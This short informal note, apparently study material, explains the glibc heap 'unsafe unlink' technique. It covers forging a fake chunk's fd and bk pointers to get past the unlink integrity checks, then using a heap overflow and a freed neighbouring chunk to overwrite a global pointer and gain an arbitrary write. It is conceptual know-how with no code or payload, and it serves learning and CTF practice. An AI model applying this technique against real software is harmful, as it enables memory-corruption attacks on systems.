For this method to work u need to have
- A global pointer
- Heap overflow
-
create a fake chunk inside a chunk pointed by global pointer with prev_size , size , fd , bk .
-
create fd and bk of fake chunk such that
- *(fd+12) = *(bk+8) = *(global ptr) = chunk_0
- With this we bypass the check P->fd->bk != P
* Set size of fake chunk as :
* chunk_0->size = *fd // prev_size
* this bypass the check made by libc chunksize(P) != fd->prev_size
-
set chunk1->prev_size = size_requested
- such that it points at start of fake chunk
- this makes our chunk_0 to shrink
- set chunk1->size prev inuse bit 0
-
Now free(chunk_1)
-
our fake chunk gets unlinked and causes to overwrite the global pointer
-
We can now have arbitaray write